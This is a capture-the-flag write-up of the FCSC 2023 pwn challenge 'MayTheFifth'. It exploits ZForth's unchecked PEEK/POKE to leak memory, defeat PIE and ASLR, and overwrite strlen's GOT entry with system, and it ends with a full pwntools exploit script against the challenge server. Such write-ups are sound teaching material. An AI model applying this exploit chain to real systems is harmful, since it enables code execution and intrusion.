[FCSC 2023] Pwn - MayTheFifth


Challenge Description


ZForth is an open-source implementation of Forth. It is designed to run on embedded systems and to be very lightweight. [Wikipedia]


We are given a few files: core.zf, which contains the dictionary of instructions; ld-2.31.so, libc-2.31.so and libm-2.31.so, the loader, libc and math library used on the remote server; zforth, the challenge binary; and finally zforth-src.tar.gz, which contains all the files needed for compilation along with the vulnerable configuration.

My Setup

For this challenge I used:

- Pwndbg to debug -> https://github.com/pwndbg/pwndbg
- Pwntools to script -> https://docs.pwntools.com/en/stable/

There was no need for a decompiler because we had the source code of the binary.

Vulnerability explanation

In the archive zforth-src.tar.gz there is a file named “tell.patch” that describes the modifications made to the original configuration of ZForth.

I am not going to describe the whole file but the most important part is this one:


Debugging the dictionary

zForth provides useful PEEK and POKE primitives, used when inspecting bytes inside the dictionary (“dict”), typically for debugging purposes. The PEEK command is very simple: first enter the offset inside the dictionary followed by the size of the data to be read, typically 4 and the ‘@@’ keyword (defined in core.zf):

143 4 @@ .
309357920 

Similarly, POKE allows you to directly modify data inside the dictionary, this time the data to be written is first, followed by the offset and the size, and then ‘!!':

20204 143 3 !!
143 3 @@ .
20204

Please be very careful when using PEEK and POKE. They are very powerful commands, and their use can lead to undefined behaviour!


We also know that, for performance reasons, ASAN, ZF_ENABLE_BOUNDARY_CHECKS and setjmp/longjmp were disabled.

ZF_ENABLE_BOUNDARY_CHECKS is the option in charge of checking that PEEK and POKE do not read or write outside of the dict variable. With it disabled, we basically have a read and write primitive, relative to dict, on the binary’s memory.

How could this be useful?

We can use it to leak the binary's memory and therefore defeat ASLR (Address Space Layout Randomization) and PIE (Position Independent Executable), and then overwrite the GOT (Global Offset Table) entry of a function so that another function gets called instead.

Defeating ASLR and PIE

To leak memory, I used PEEK, which is supposed to be used to inspect ZForth's dictionary of instructions.

Basically, it reads memory like this:

(pseudo code)

function peek(offset, len) {
    // no bounds check on offset: dict + offset can land anywhere
    write(1, dict + offset, len)
}

This means that if we give peek an offset lower than 0, we read memory located before dict, and if we give it an offset bigger than 4096, we read memory located after it.
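To make the idea concrete, here is a minimal toy model of an unchecked PEEK/POKE. It is not ZForth's actual implementation: `ToyMemory`, `dict_start` and `boundary_checks` are names I made up for the illustration, and the process memory is just a flat `bytearray` with the 4096-byte dictionary sitting somewhere in the middle.

```python
DICT_SIZE = 4096  # dictionary size mentioned above


class ToyMemory:
    """Toy model (hypothetical): flat memory with dict located at dict_start."""

    def __init__(self, dict_start, total_size, boundary_checks):
        self.mem = bytearray(total_size)
        self.dict_start = dict_start
        self.boundary_checks = boundary_checks

    def _resolve(self, offset, size):
        # With the checks enabled, any access outside [0, DICT_SIZE) is refused.
        if self.boundary_checks and not (0 <= offset and offset + size <= DICT_SIZE):
            raise IndexError("access outside of dict")
        # Without them, the offset is simply added to the start of dict.
        return self.dict_start + offset

    def peek(self, offset, size):
        start = self._resolve(offset, size)
        return int.from_bytes(self.mem[start:start + size], "little")

    def poke(self, value, offset, size):
        start = self._resolve(offset, size)
        self.mem[start:start + size] = value.to_bytes(size, "little")


if __name__ == "__main__":
    memory = ToyMemory(dict_start=1000, total_size=8192, boundary_checks=False)
    memory.mem[700:704] = (0xdeadbeef).to_bytes(4, "little")  # data located before dict
    print(hex(memory.peek(-300, 4)))  # negative offset reads before dict
```

With `boundary_checks=True`, the same `peek(-300, 4)` raises an `IndexError`, which is the behaviour the challenge configuration gives up.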

If we want to read or write at an arbitrary address, we first need to find the address of dict so that we can compute dict+offset. To do that, I looked for a place in memory that holds a pointer to dict, and found one 300 bytes before dict. Reading it leaks the address of dict. From there we can also find the base address of the binary: even though the addresses are randomized, the offsets between them stay the same. A simple subtraction shows that the base of the binary is 24992 bytes below the address of dict. So once we have leaked dict, we also have the base address of the binary.

With all of this, we can leak the LIBC base address: in the binary's GOT, the entry of each resolved function points to the address of that same function in the LIBC.
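The arithmetic above can be sketched as follows. The constant 24992 is the one measured in this write-up; the helper names and the example addresses are made up for the illustration and are not real leaks.

```python
DICT_TO_BASE = 24992  # distance between the binary's base and dict (0x61a0)


def pie_base_from_dict(dict_addr):
    """Base address of the binary, deduced from the leaked address of dict."""
    return dict_addr - DICT_TO_BASE


def offset_for(dict_addr, target_addr):
    """Offset to give to @@ or !! so that dict + offset == target_addr.

    The result is negative when the target is located before dict.
    """
    return target_addr - dict_addr


if __name__ == "__main__":
    dict_addr = 0x565561a0  # made-up leak, for illustration only
    print(hex(pie_base_from_dict(dict_addr)))  # 0x56550000
    print(offset_for(dict_addr, 0x56555000))   # -4512
```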

As an example, the GOT entry of the function printf points to the address of the function printf in the LIBC.
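As a minimal sketch of that last step: once the GOT entry has been read, the LIBC base is the leaked address minus the offset of the function inside the LIBC file. The helper name and the numbers below are invented for the example (they are not the real printf offset of libc-2.31.so). The page-alignment check is an extra sanity check I added here; it is not part of the original exploit.

```python
PAGE_SIZE = 0x1000


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Return the LIBC base given a leaked function address and its offset in the LIBC."""
    base = leaked_addr - symbol_offset
    # A shared library is mapped on a page boundary, so a base that is not
    # page-aligned means the leak or the offset is wrong.
    if base % PAGE_SIZE != 0:
        raise ValueError("suspicious LIBC base: %#x" % base)
    return base


if __name__ == "__main__":
    # Made-up values, for illustration only.
    print(hex(libc_base_from_leak(0xf7d53de0, 0x53de0)))  # 0xf7d00000
```

With pwntools, the offset would typically come from `libc.sym['printf']` before `libc.address` is set, as done in the PoC.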

To leak this, I made a very simple function that calculates the input needed to leak the content of an arbitrary address:

def read_primitive(base_addr, addr, length):
    """
    > 143 4 @@ .
    > 309357920
    """
    # PEEK takes an offset relative to base_addr (the address of dict)
    payload = "%i %i @@ ." % (addr - base_addr, length)
    return payload


# p is the pwntools tube opened in the PoC
p.sendline(read_primitive(leak_base, printf_got, 4).encode())
leak = p.recvline().strip()
print(hex(int(leak, 0))) # -> 0xf4b89000 (for example)

With all of this in hand, we now have everything we need to get a shell and the flag.

Popping a shell

It actually took me a lot of time to finish this step because I did not read the code carefully and lost a lot of time on weird errors.

To spawn our shell, I decided to overwrite an entry in the GOT. For reasons I still do not understand, the function I built to write content at arbitrary addresses was not precise at all, so it was impossible to simply overwrite a GOT entry with a one gadget (a piece of code in glibc that spawns a shell). Instead, I had to find a place in the ZForth code where a function from the GOT is called with a single argument that I control.

At one point, I tried to overwrite the entry of printf. It was spawning a shell, but that shell was then executing the command “zf_abort::”, which is obviously not a valid command, so it was crashing.

I ended up choosing this snippet of code:

/*
 * Find word in dictionary, returning address and execution token
 */

static int find_word(const char *name, zf_addr *word, zf_addr *code)
{
	zf_addr w = LATEST;
	size_t namelen = strlen(name);

	while(w) {
		zf_cell link, d;
		zf_addr p = w;
		size_t len;
		p += dict_get_cell(p, &d);
		p += dict_get_cell(p, &link);
		len = ZF_FLAG_LEN((int)d);
		if(len == namelen) {
			const char *name2 = (const char *)&dict[p];
			if(memcmp(name, name2, len) == 0) {
				*word = w;
				*code = p + len;
				return 1;
			}
		}
		w = link;
	}

	return 0;
}

I chose it because I control the first argument of strlen, and this function is very easy to reach: every time a new line is sent to the interpreter, each space-separated word is passed to find_word.
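Here is a toy model of why this call site works. It is only a sketch, not ZForth or libc code: the `got` dictionary stands in for the real GOT, `fake_system` for the LIBC's system, and `eval_line` for the interpreter loop. They are all names I made up for the illustration.

```python
calls = []  # records every "command" our stand-in for system() receives


def fake_system(command):
    """Stand-in for system(): only records the command it was given."""
    calls.append(command)
    return 0


# Stand-in for the GOT: strlen initially resolves to the real function.
got = {"strlen": len}


def find_word(name):
    # Like in the C code above, the first thing done with the word is an
    # indirect call to strlen through the GOT, with the word as only argument.
    return got["strlen"](name)


def eval_line(line):
    # Every word of the line, split on whitespace, goes through find_word.
    for word in line.split():
        find_word(word)


if __name__ == "__main__":
    got["strlen"] = fake_system  # the GOT overwrite
    eval_line("/bin/sh some_other_word")
    print(calls)
```

Since each word is looked up separately, the command has to fit in a single word without spaces, which is the case for /bin/sh.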

Summary of our exploit

  1. We leak the base address of the binary and the address of dict
  2. Using our earlier leaks, we leak the base address of the LIBC
  3. We overwrite the GOT entry of strlen with the address of system and then we send /bin/sh to spawn our shell.
  4. Get the flag and stop cybersecurity

PoC

from pwn import *


elf = ELF('./zforth', checksec=False)

libc = ELF("./libc-2.31.so", checksec=False)

#p = process([elf.path, 'core.zf'])
p = remote("challenges.france-cybersecurity-challenge.fr",2107)
p.recvline()


def write_primitive(base_addr, content , addr, length):
    """
    > 20204 143 3 !!
    > 143 3 @@ .
    > 20204
    """
    payload = "%i %i %i !!" % (content, addr - base_addr, length)
    return payload

def read_primitive(base_addr, addr, length):
    """
    > 143 4 @@ .
    > 309357920
    """
    payload = "%i %i @@ ." % (addr-base_addr, length)
    return payload


# GET DICT ADDRESS AND BASE ADDR OF THE BINARY

payload = b"-300 4 @@ ."
p.sendline(payload)

dict_address = int(p.recvline().strip(), 0)
dict_address += 0x20

info("DICT @%s" % hex(dict_address))

elf.address = dict_address - 24992

info("PIE  @%s" % hex(elf.address))

# LEAK LIBC

printf_got = elf.got['printf']

payload = read_primitive(dict_address, printf_got, 4)
p.sendline(payload.encode())

printf_libc = int(p.recvline().strip(), 0)
printf_libc += 0x20

libc.address = printf_libc  - libc.sym['printf']

info("LIBC  @%s" % hex(libc.address))

success("STAGE 1 COMPLETED.")

system = libc.sym['system']
strlen_got = elf.got['strlen']

# Overwrite GOT

payload = write_primitive(dict_address, system , strlen_got , 4)
p.sendline(payload.encode())

p.sendline(b"/bin/sh ouais_allo_c'est_greg")
p.interactive()

Conclusion

This challenge was very interesting, and it was my first time exploiting “real” software (even if it was not in its default configuration), so I felt like a genius. Huge thanks to cde (cde#1518 on discord) and \J (\J#8677 on discord) for this challenge :thumbsup:

If you have any questions feel free to send me a message on Discord: @numb3rss